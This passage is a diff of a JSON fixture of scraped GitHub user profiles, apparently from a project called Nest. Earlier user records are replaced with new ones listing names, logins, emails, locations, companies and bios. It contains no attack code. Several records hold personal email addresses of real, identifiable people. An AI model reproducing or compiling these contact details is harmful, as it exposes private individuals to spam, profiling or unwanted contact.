"https://avatars.githubusercontent.com/u/1688580?v=4", - "company": "@iteratec", - "location": "Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/184563?v=4", + "company": "", + "location": "Portugal", "collaborators_count": 0, - "following_count": 9, - "followers_count": 48, - "public_gists_count": 8, - "public_repositories_count": 36, - "created_at": "2012-04-28T18:42:55Z", - "updated_at": "2024-08-23T12:03:26Z", - "node_id": "MDQ6VXNlcjE2ODg1ODA=", - "bio": "Senior Security specialist @Iteratec. Alumni of @seemoo-lab at TU Darmstadt", + "following_count": 59, + "followers_count": 163, + "public_gists_count": 74, + "public_repositories_count": 78, + "created_at": "2010-01-18T12:01:41Z", + "updated_at": "2024-09-05T14:06:02Z", + "node_id": "MDQ6VXNlcjE4NDU2Mw==", + "bio": "Web Engineer / Tech Lead, Porto, PT 🇵🇹\r\n\r\nPassionate about everything tech and I am eager to learn new things. ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1617, + "pk": 6909, "fields": { - "nest_created_at": "2024-09-12T00:18:03.178Z", - "nest_updated_at": "2024-09-12T00:18:04.402Z", - "name": "Jop Zitman", - "login": "EndPositive", - "email": "jop-zitman@hotmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/25148195?v=4", + "nest_created_at": "2024-09-22T07:48:52.627Z", + "nest_updated_at": "2024-09-22T18:51:26.147Z", + "name": "Bruce Adams", + "login": "badamsdev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5435504?v=4", "company": "", - "location": "", + "location": "UK", "collaborators_count": 0, - "following_count": 7, - "followers_count": 15, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 20, - "created_at": "2017-01-16T09:20:52Z", - "updated_at": "2024-09-09T12:32:32Z", - "node_id": "MDQ6VXNlcjI1MTQ4MTk1", - "bio": "Advanced Computing at Tsinghua University", + "public_repositories_count": 3, + "created_at": "2013-09-11T12:23:23Z", + "updated_at": "2024-08-30T15:31:55Z", + "node_id": "MDQ6VXNlcjU0MzU1MDQ=", + "bio": "", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1618, + "pk": 6910, "fields": { - "nest_created_at": "2024-09-12T00:18:05.655Z", - "nest_updated_at": "2024-09-12T00:20:29.051Z", - "name": "Sven Strittmatter", - "login": "Weltraumschaf", - "email": "ich@weltraumschaf.de", - "avatar_url": "https://avatars.githubusercontent.com/u/113232?v=4", - "company": "iteratec GmbH", - "location": "Stuttgart", + "nest_created_at": "2024-09-22T07:48:52.949Z", + "nest_updated_at": "2024-09-22T18:51:26.454Z", + "name": "Brian LeRoux", + "login": "brianleroux", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/990?v=4", + "company": "Begin.com", + "location": "Canada", "collaborators_count": 0, - "following_count": 12, - "followers_count": 38, - "public_gists_count": 11, - "public_repositories_count": 102, - "created_at": "2009-08-08T15:12:48Z", - "updated_at": "2024-08-27T11:00:42Z", - "node_id": "MDQ6VXNlcjExMzIzMg==", - "bio": "🇪🇺 (he/him) Security / Software Architecture / Clean Code @iteratec", + "following_count": 679, + "followers_count": 1839, + "public_gists_count": 189, + "public_repositories_count": 393, + "created_at": "2008-02-26T20:58:47Z", + "updated_at": "2024-09-21T12:42:34Z", + "node_id": "MDQ6VXNlcjk5MA==", + "bio": "Currently building https://begin.com with https://arc.codes ✨🔰 https://brian.io", + "is_hireable": false, + "twitter_username": "brianleroux" + } +}, +{ + "model": "github.user", + "pk": 6911, + "fields": { + "nest_created_at": "2024-09-22T07:48:53.261Z", + "nest_updated_at": "2024-09-22T18:51:26.771Z", + "name": "Brian Delgado", + "login": "briansantura", + "email": "delgadobrian12@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/23461819?v=4", + "company": "Santura Systems", + "location": "Murrieta, California", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 12, + "public_gists_count": 1, + "public_repositories_count": 4, + "created_at": "2016-11-14T19:51:23Z", + "updated_at": "2024-09-03T11:41:58Z", + "node_id": "MDQ6VXNlcjIzNDYxODE5", + "bio": "Always Learning", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1619, + "pk": 6912, "fields": { - "nest_created_at": "2024-09-12T00:18:51.175Z", - "nest_updated_at": "2024-09-12T00:20:07.936Z", - "name": "Ilyes Ben Dlala", - "login": "Ilyesbdlala", - "email": "ilyes.bendlala@iteratec.com", - "avatar_url": "https://avatars.githubusercontent.com/u/62256235?v=4", + "nest_created_at": "2024-09-22T07:48:53.572Z", + "nest_updated_at": "2024-09-22T18:51:27.109Z", + "name": "Brennan", + "login": "BrennanConroy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7574801?v=4", "company": "", - "location": "Darmstadt, DE", + "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 8, + "following_count": 0, + "followers_count": 373, "public_gists_count": 6, - "public_repositories_count": 6, - "created_at": "2020-03-16T16:28:35Z", - "updated_at": "2024-08-28T12:37:01Z", - "node_id": "MDQ6VXNlcjYyMjU2MjM1", + "public_repositories_count": 54, + "created_at": "2014-05-13T23:00:04Z", + "updated_at": "2024-04-09T16:55:29Z", + "node_id": "MDQ6VXNlcjc1NzQ4MDE=", + "bio": "Developer on ASP.NET Core.\r\n\r\nSignalR all the things.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6913, + "fields": { + "nest_created_at": "2024-09-22T07:48:53.878Z", + "nest_updated_at": "2024-09-22T18:51:27.414Z", + "name": "Brandon Van Noy", + "login": "brandom", + "email": "bvannoy@me.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1589097?v=4", + "company": "medfusion", + "location": "Denton, TX", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 6, + "public_gists_count": 5, + "public_repositories_count": 49, + "created_at": "2012-03-30T02:27:41Z", + "updated_at": "2024-05-08T13:48:47Z", + "node_id": "MDQ6VXNlcjE1ODkwOTc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -400728,24 +658752,24 @@ }, { "model": "github.user", - "pk": 1620, + "pk": 6914, "fields": { - "nest_created_at": "2024-09-12T00:19:00.658Z", - "nest_updated_at": "2024-09-12T00:19:00.658Z", - "name": "Vanessa Hermann", - "login": "ManuelNeuer", + "nest_created_at": "2024-09-22T07:48:54.192Z", + "nest_updated_at": "2024-09-22T18:51:27.725Z", + "name": "Boyan Velinov", + "login": "boyan-velinov", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/29129382?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/32568491?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2017-06-01T18:32:40Z", - "updated_at": "2024-08-11T10:28:01Z", - "node_id": "MDQ6VXNlcjI5MTI5Mzgy", + "public_repositories_count": 14, + "created_at": "2017-10-06T10:21:49Z", + "updated_at": "2024-05-28T12:08:10Z", + "node_id": "MDQ6VXNlcjMyNTY4NDkx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -400753,24 +658777,24 @@ }, { "model": "github.user", - "pk": 1621, + "pk": 6915, "fields": { - "nest_created_at": "2024-09-12T00:19:03.141Z", - "nest_updated_at": "2024-09-12T00:19:03.142Z", + "nest_created_at": "2024-09-22T07:48:54.547Z", + "nest_updated_at": "2024-09-22T18:51:28.033Z", "name": "", - "login": "sourabhsdeshpande", + "login": "Boris-ILIEV", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/101176914?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/67998676?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-03-08T09:08:00Z", - "updated_at": "2024-03-05T11:20:59Z", - "node_id": "U_kgDOBgfWUg", + "public_repositories_count": 5, + "created_at": "2020-07-08T07:01:54Z", + "updated_at": "2020-08-21T12:57:21Z", + "node_id": "MDQ6VXNlcjY3OTk4Njc2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -400778,24 +658802,24 @@ }, { "model": "github.user", - "pk": 1622, + "pk": 6916, "fields": { - "nest_created_at": "2024-09-12T00:19:04.453Z", - "nest_updated_at": "2024-09-12T00:19:04.453Z", - "name": "_5R3U5T0N_", - "login": "renatosazup-zz", + "nest_created_at": "2024-09-22T07:48:54.860Z", + "nest_updated_at": "2024-09-22T18:51:28.347Z", + "name": "Bill Hiebert", + "login": "BillHiebert", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/88499872?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1553785?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2021-08-05T14:52:14Z", - "updated_at": "2022-09-16T18:42:22Z", - "node_id": "MDQ6VXNlcjg4NDk5ODcy", + "public_repositories_count": 8, + "created_at": "2012-03-19T18:04:21Z", + "updated_at": "2024-08-07T21:15:55Z", + "node_id": "MDQ6VXNlcjE1NTM3ODU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -400803,124 +658827,124 @@ }, { "model": "github.user", - "pk": 1623, + "pk": 6917, "fields": { - "nest_created_at": "2024-09-12T00:19:11.108Z", - "nest_updated_at": "2024-09-12T00:19:11.108Z", - "name": "Rami Souai", - "login": "RamiSouai", - "email": "rami.souai@iteratec.com", - "avatar_url": "https://avatars.githubusercontent.com/u/68519768?v=4", - "company": "Iteratec", - "location": "Darmstadt", + "nest_created_at": "2024-09-22T07:48:55.180Z", + "nest_updated_at": "2024-09-22T18:51:28.653Z", + "name": "Bernardo Kuri", + "login": "bkuri", + "email": "github@bkuri.com", + "avatar_url": "https://avatars.githubusercontent.com/u/138886?v=4", + "company": "Freelance", + "location": "Mexico City", "collaborators_count": 0, - "following_count": 2, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2020-07-19T22:35:53Z", - "updated_at": "2024-02-01T20:44:50Z", - "node_id": "MDQ6VXNlcjY4NTE5NzY4", - "bio": "", + "following_count": 16, + "followers_count": 29, + "public_gists_count": 17, + "public_repositories_count": 43, + "created_at": "2009-10-12T20:39:10Z", + "updated_at": "2024-09-17T18:17:46Z", + "node_id": "MDQ6VXNlcjEzODg4Ng==", + "bio": "Full stack developer", "is_hireable": false, - "twitter_username": "" + "twitter_username": "bkuri" } }, { "model": "github.user", - "pk": 1624, + "pk": 6918, "fields": { - "nest_created_at": "2024-09-12T00:19:16.964Z", - "nest_updated_at": "2024-09-12T00:19:16.964Z", - "name": "Justin Dearing", - "login": "ascratchedhand", + "nest_created_at": "2024-09-22T07:48:55.491Z", + "nest_updated_at": "2024-09-22T18:51:28.978Z", + "name": "Benjamin Fogel", + "login": "legofneb", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4696810?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3577334?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 24, + "following_count": 0, "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2013-06-14T09:51:13Z", - "updated_at": "2023-06-10T12:26:37Z", - "node_id": "MDQ6VXNlcjQ2OTY4MTA=", + "public_gists_count": 4, + "public_repositories_count": 18, + "created_at": "2013-02-12T18:28:03Z", + "updated_at": "2020-11-06T15:35:38Z", + "node_id": "MDQ6VXNlcjM1NzczMzQ=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1625, + "pk": 6919, "fields": { - "nest_created_at": "2024-09-12T00:19:18.720Z", - "nest_updated_at": "2024-09-12T00:19:18.720Z", - "name": "Bruno Gomes", - "login": "brunowego", - "email": "brunowego@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/441774?v=4", - "company": "@henkiz", - "location": "Worldwide", + "nest_created_at": "2024-09-22T07:48:55.804Z", + "nest_updated_at": "2024-09-22T18:51:29.294Z", + "name": "Bence Nagy", + "login": "underyx", + "email": "bence@underyx.me", + "avatar_url": "https://avatars.githubusercontent.com/u/1060436?v=4", + "company": "@returntocorp", + "location": "San Francisco", "collaborators_count": 0, - "following_count": 1, - "followers_count": 347, - "public_gists_count": 8, - "public_repositories_count": 39, - "created_at": "2010-10-16T11:36:30Z", - "updated_at": "2024-09-07T21:54:18Z", - "node_id": "MDQ6VXNlcjQ0MTc3NA==", - "bio": "Hi. I'm Bruno, a founding engineer based in Goiás, Brazil. Some things that I love: automation, creating UI, scaling software, and working with users.", + "following_count": 144, + "followers_count": 146, + "public_gists_count": 16, + "public_repositories_count": 134, + "created_at": "2011-09-18T20:03:06Z", + "updated_at": "2024-09-02T11:21:42Z", + "node_id": "MDQ6VXNlcjEwNjA0MzY=", + "bio": "I have approximate knowledge of many things.", "is_hireable": true, - "twitter_username": "brunowego" + "twitter_username": "underyx" } }, { "model": "github.user", - "pk": 1626, + "pk": 6920, "fields": { - "nest_created_at": "2024-09-12T00:19:24.012Z", - "nest_updated_at": "2024-09-12T00:19:24.012Z", - "name": "SitoRBJ", - "login": "SitoRBJ", - "email": "sitoruizbravo@hotmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/8913336?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:48:56.111Z", + "nest_updated_at": "2024-09-22T18:51:29.619Z", + "name": "Ben Firshman", + "login": "bfirsh", + "email": "ben@replicate.com", + "avatar_url": "https://avatars.githubusercontent.com/u/40906?v=4", + "company": "@replicate", + "location": "San Francisco, CA, USA", "collaborators_count": 0, - "following_count": 14, - "followers_count": 16, - "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2014-09-25T10:09:07Z", - "updated_at": "2024-02-02T08:18:47Z", - "node_id": "MDQ6VXNlcjg5MTMzMzY=", + "following_count": 171, + "followers_count": 2224, + "public_gists_count": 8, + "public_repositories_count": 236, + "created_at": "2008-12-17T03:48:00Z", + "updated_at": "2024-08-17T20:19:14Z", + "node_id": "MDQ6VXNlcjQwOTA2", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "bfirsh" } }, { "model": "github.user", - "pk": 1627, + "pk": 6921, "fields": { - "nest_created_at": "2024-09-12T00:19:25.230Z", - "nest_updated_at": "2024-09-12T00:19:28.524Z", - "name": "Lukas Fischer", - "login": "o1oo11oo", + "nest_created_at": "2024-09-22T07:48:56.429Z", + "nest_updated_at": "2024-09-22T18:51:29.929Z", + "name": "", + "login": "Basvg", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1590475?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2334483?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 9, - "public_gists_count": 1, - "public_repositories_count": 12, - "created_at": "2012-03-30T13:24:34Z", - "updated_at": "2024-09-09T13:30:21Z", - "node_id": "MDQ6VXNlcjE1OTA0NzU=", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2012-09-12T20:04:20Z", + "updated_at": "2024-09-05T09:09:18Z", + "node_id": "MDQ6VXNlcjIzMzQ0ODM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -400928,124 +658952,124 @@ }, { "model": "github.user", - "pk": 1628, + "pk": 6922, "fields": { - "nest_created_at": "2024-09-12T00:19:29.768Z", - "nest_updated_at": "2024-09-12T00:19:44.415Z", - "name": "Max", - "login": "moxli", + "nest_created_at": "2024-09-22T07:48:56.786Z", + "nest_updated_at": "2024-09-22T18:51:30.237Z", + "name": "Alexander Falb", + "login": "elexx", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26149616?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/221837?v=4", "company": "", - "location": "", + "location": "Austria", "collaborators_count": 0, - "following_count": 10, - "followers_count": 4, - "public_gists_count": 1, - "public_repositories_count": 5, - "created_at": "2017-03-02T20:03:31Z", - "updated_at": "2024-09-09T09:24:26Z", - "node_id": "MDQ6VXNlcjI2MTQ5NjE2", - "bio": "", + "following_count": 26, + "followers_count": 18, + "public_gists_count": 5, + "public_repositories_count": 62, + "created_at": "2010-03-13T09:46:08Z", + "updated_at": "2024-09-16T13:52:25Z", + "node_id": "MDQ6VXNlcjIyMTgzNw==", + "bio": "Java & Kotlin enthusiast, @apache Committer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1629, + "pk": 6923, "fields": { - "nest_created_at": "2024-09-12T00:19:34.046Z", - "nest_updated_at": "2024-09-12T00:19:34.046Z", - "name": "Harm Geerts", - "login": "Urth", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/654042?v=4", + "nest_created_at": "2024-09-22T07:48:57.098Z", + "nest_updated_at": "2024-09-22T18:51:30.545Z", + "name": "Alex Macleod", + "login": "Alexendoo", + "email": "alex@macleod.io", + "avatar_url": "https://avatars.githubusercontent.com/u/1830331?v=4", "company": "", - "location": "", + "location": "United Kingdom", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 3, - "public_repositories_count": 12, - "created_at": "2011-03-06T15:09:20Z", - "updated_at": "2024-07-10T12:35:54Z", - "node_id": "MDQ6VXNlcjY1NDA0Mg==", - "bio": "Harm Geerts", - "is_hireable": false, + "following_count": 14, + "followers_count": 80, + "public_gists_count": 4, + "public_repositories_count": 99, + "created_at": "2012-06-08T11:17:02Z", + "updated_at": "2024-08-28T11:23:49Z", + "node_id": "MDQ6VXNlcjE4MzAzMzE=", + "bio": "", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1630, + "pk": 6924, "fields": { - "nest_created_at": "2024-09-12T00:19:35.282Z", - "nest_updated_at": "2024-09-12T00:19:35.282Z", - "name": "dima steklar", - "login": "Dstklr", - "email": "dsteklar@cisco.com", - "avatar_url": "https://avatars.githubusercontent.com/u/28775559?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:48:57.412Z", + "nest_updated_at": "2024-09-22T18:51:30.862Z", + "name": "Alex Blackie", + "login": "alexblackie", + "email": "alex@blackie.ca", + "avatar_url": "https://avatars.githubusercontent.com/u/270946?v=4", + "company": "@linearforest & @blackieops", + "location": "Montréal, QC", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2017-05-18T07:09:10Z", - "updated_at": "2024-08-28T12:55:15Z", - "node_id": "MDQ6VXNlcjI4Nzc1NTU5", - "bio": "", + "following_count": 33, + "followers_count": 82, + "public_gists_count": 29, + "public_repositories_count": 24, + "created_at": "2010-05-08T04:49:59Z", + "updated_at": "2024-08-18T13:06:28Z", + "node_id": "MDQ6VXNlcjI3MDk0Ng==", + "bio": "i stole this from a hockey card", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1631, + "pk": 6925, "fields": { - "nest_created_at": "2024-09-12T00:19:41.947Z", - "nest_updated_at": "2024-09-12T00:19:41.947Z", - "name": "Nir Zezak", - "login": "nierz", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/59607155?v=4", - "company": "@cisco-eti", - "location": "", + "nest_created_at": "2024-09-22T07:48:57.746Z", + "nest_updated_at": "2024-09-22T18:51:31.171Z", + "name": "Alex Allen", + "login": "lxalln", + "email": "i.am@lxalln.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2781908?v=4", + "company": "Koan", + "location": "Cirencester", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2020-01-07T11:54:38Z", - "updated_at": "2024-09-05T11:21:33Z", - "node_id": "MDQ6VXNlcjU5NjA3MTU1", + "following_count": 1, + "followers_count": 5, + "public_gists_count": 5, + "public_repositories_count": 17, + "created_at": "2012-11-12T22:07:49Z", + "updated_at": "2024-08-19T21:06:05Z", + "node_id": "MDQ6VXNlcjI3ODE5MDg=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1632, + "pk": 6926, "fields": { - "nest_created_at": "2024-09-12T00:19:43.167Z", - "nest_updated_at": "2024-09-12T00:19:43.167Z", - "name": "Alon Katz", - "login": "Alon-Katz", + "nest_created_at": "2024-09-22T07:48:58.062Z", + "nest_updated_at": "2024-09-22T18:51:31.509Z", + "name": "Alex", + "login": "alexhouse", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7746785?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2657291?v=4", "company": "", - "location": "Israel", + "location": "Newcastle upon Tyne, UK", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2014-05-30T13:04:35Z", - "updated_at": "2024-09-04T11:36:41Z", - "node_id": "MDQ6VXNlcjc3NDY3ODU=", + "following_count": 1, + "followers_count": 5, + "public_gists_count": 2, + "public_repositories_count": 36, + "created_at": "2012-10-26T13:15:30Z", + "updated_at": "2024-08-13T10:05:09Z", + "node_id": "MDQ6VXNlcjI2NTcyOTE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -401053,24 +659077,24 @@ }, { "model": "github.user", - "pk": 1633, + "pk": 6927, "fields": { - "nest_created_at": "2024-09-12T00:19:47.837Z", - "nest_updated_at": "2024-09-12T00:19:49.044Z", - "name": "Danil Smirnov", - "login": "danil-smirnov", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/27999539?v=4", + "nest_created_at": "2024-09-22T07:48:58.369Z", + "nest_updated_at": "2024-09-22T18:51:31.839Z", + "name": "Aleksi Pekkala", + "login": "epiphone", + "email": "aleksipekkala@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1923531?v=4", "company": "", - "location": "Riga, Latvia", + "location": "Seoul, South Korea", "collaborators_count": 0, - "following_count": 23, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 38, - "created_at": "2017-04-25T09:21:35Z", - "updated_at": "2024-08-07T11:59:02Z", - "node_id": "MDQ6VXNlcjI3OTk5NTM5", + "following_count": 188, + "followers_count": 64, + "public_gists_count": 4, + "public_repositories_count": 49, + "created_at": "2012-07-04T20:41:14Z", + "updated_at": "2024-08-20T10:03:44Z", + "node_id": "MDQ6VXNlcjE5MjM1MzE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -401078,74 +659102,74 @@ }, { "model": "github.user", - "pk": 1634, + "pk": 6928, "fields": { - "nest_created_at": "2024-09-12T00:19:50.285Z", - "nest_updated_at": "2024-09-12T00:19:57.695Z", - "name": "", - "login": "kaz-33", + "nest_created_at": "2024-09-22T07:48:58.680Z", + "nest_updated_at": "2024-09-22T18:51:32.158Z", + "name": "Aleksandr Kuzmenko", + "login": "RealyUniqueName", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/52995191?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3155708?v=4", "company": "", - "location": "", + "location": "Russia, Moscow", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-07-17T07:42:14Z", - "updated_at": "2024-07-02T11:53:33Z", - "node_id": "MDQ6VXNlcjUyOTk1MTkx", + "followers_count": 124, + "public_gists_count": 15, + "public_repositories_count": 78, + "created_at": "2012-12-30T22:53:19Z", + "updated_at": "2024-09-03T11:25:13Z", + "node_id": "MDQ6VXNlcjMxNTU3MDg=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1635, + "pk": 6929, "fields": { - "nest_created_at": "2024-09-12T00:19:53.191Z", - "nest_updated_at": "2024-09-12T00:19:53.191Z", - "name": "Philip Voß", - "login": "vo55", + "nest_created_at": "2024-09-22T07:48:58.988Z", + "nest_updated_at": "2024-09-22T18:51:32.523Z", + "name": "Alan Plum", + "login": "pluma", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13383229?v=4", - "company": "", - "location": "Münster", + "avatar_url": "https://avatars.githubusercontent.com/u/1280922?v=4", + "company": "Senior Consultant at @foss-haas", + "location": "Rheda-Wiedenbrück, Germany", "collaborators_count": 0, - "following_count": 35, - "followers_count": 19, - "public_gists_count": 1, - "public_repositories_count": 22, - "created_at": "2015-07-17T15:39:18Z", - "updated_at": "2024-08-23T18:05:50Z", - "node_id": "MDQ6VXNlcjEzMzgzMjI5", - "bio": "
", - "is_hireable": false, - "twitter_username": "BarwiPhilip" + "following_count": 59, + "followers_count": 208, + "public_gists_count": 29, + "public_repositories_count": 53, + "created_at": "2011-12-22T21:46:09Z", + "updated_at": "2024-08-28T23:46:47Z", + "node_id": "MDQ6VXNlcjEyODA5MjI=", + "bio": "Building ole-scout.app, web dev, ❤️ React & TypeScript. Inquiries to my firstname at foss-haas dot de", + "is_hireable": true, + "twitter_username": "lnplum" } }, { "model": "github.user", - "pk": 1636, + "pk": 6930, "fields": { - "nest_created_at": "2024-09-12T00:19:56.471Z", - "nest_updated_at": "2024-09-12T00:19:56.471Z", - "name": "Boris Shek", - "login": "BorisShek", + "nest_created_at": "2024-09-22T08:34:18.113Z", + "nest_updated_at": "2024-09-22T18:51:32.831Z", + "name": "Pascal Blessing", + "login": "ScallyGames", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/152714414?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2143625?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 11, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2023-12-02T15:26:39Z", - "updated_at": "2024-08-13T11:19:06Z", - "node_id": "U_kgDOCRo8rg", + "public_repositories_count": 52, + "created_at": "2012-08-13T09:47:42Z", + "updated_at": "2024-09-04T11:21:23Z", + "node_id": "MDQ6VXNlcjIxNDM2MjU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -401153,24 +659177,24 @@ }, { "model": "github.user", - "pk": 1637, + "pk": 6931, "fields": { - "nest_created_at": "2024-09-12T00:19:59.295Z", - "nest_updated_at": "2024-09-12T00:20:01.773Z", - "name": "LittleCake", - "login": "DiiBBz", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/36804951?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:34:18.428Z", + "nest_updated_at": "2024-09-22T18:51:33.148Z", + "name": "Adrian Schönig", + "login": "nighthawk", + "email": "adrian@schoenig.me", + "avatar_url": "https://avatars.githubusercontent.com/u/22646?v=4", + "company": "SkedGo Pty Ltd", + "location": "Sydney", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-02-25T01:30:11Z", - "updated_at": "2024-08-15T11:20:56Z", - "node_id": "MDQ6VXNlcjM2ODA0OTUx", + "following_count": 32, + "followers_count": 58, + "public_gists_count": 5, + "public_repositories_count": 54, + "created_at": "2008-08-31T10:46:38Z", + "updated_at": "2024-09-21T07:56:08Z", + "node_id": "MDQ6VXNlcjIyNjQ2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -401178,99 +659202,99 @@ }, { "model": "github.user", - "pk": 1638, + "pk": 6932, "fields": { - "nest_created_at": "2024-09-12T00:20:03.860Z", - "nest_updated_at": "2024-09-12T00:20:03.860Z", - "name": "Samreet", - "login": "Reet00", - "email": "samreet.singh@iteratec.com", - "avatar_url": "https://avatars.githubusercontent.com/u/76646161?v=4", + "nest_created_at": "2024-09-22T08:34:18.755Z", + "nest_updated_at": "2024-09-22T18:51:33.465Z", + "name": "", + "login": "AdarShaked", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59121240?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2020-12-27T09:40:40Z", - "updated_at": "2024-09-10T11:13:43Z", - "node_id": "MDQ6VXNlcjc2NjQ2MTYx", - "bio": "@secureCodeBox ", + "following_count": 0, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 9, + "created_at": "2019-12-21T17:08:34Z", + "updated_at": "2021-11-10T20:56:57Z", + "node_id": "MDQ6VXNlcjU5MTIxMjQw", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1639, + "pk": 6933, "fields": { - "nest_created_at": "2024-09-12T00:20:05.080Z", - "nest_updated_at": "2024-09-16T22:24:46.623Z", - "name": "Michael Kruggel", - "login": "Michael-Kruggel", + "nest_created_at": "2024-09-22T08:34:19.068Z", + "nest_updated_at": "2024-09-22T18:51:33.778Z", + "name": "Adam Voss", + "login": "adamvoss", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/108417058?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/965439?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2022-06-29T14:56:27Z", - "updated_at": "2024-09-12T17:10:50Z", - "node_id": "U_kgDOBnZQIg", - "bio": "", + "followers_count": 50, + "public_gists_count": 4, + "public_repositories_count": 70, + "created_at": "2011-08-08T03:37:00Z", + "updated_at": "2021-01-09T20:39:09Z", + "node_id": "MDQ6VXNlcjk2NTQzOQ==", + "bio": "This is a note from Adam's father. I regret to inform you that Adam died on July 11, 2018. http://schluterbalikfuneralhome.com/obituary/adam-voss", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1640, + "pk": 6934, "fields": { - "nest_created_at": "2024-09-12T00:20:07.102Z", - "nest_updated_at": "2024-09-12T01:18:42.705Z", - "name": "", - "login": "release-drafter[bot]", + "nest_created_at": 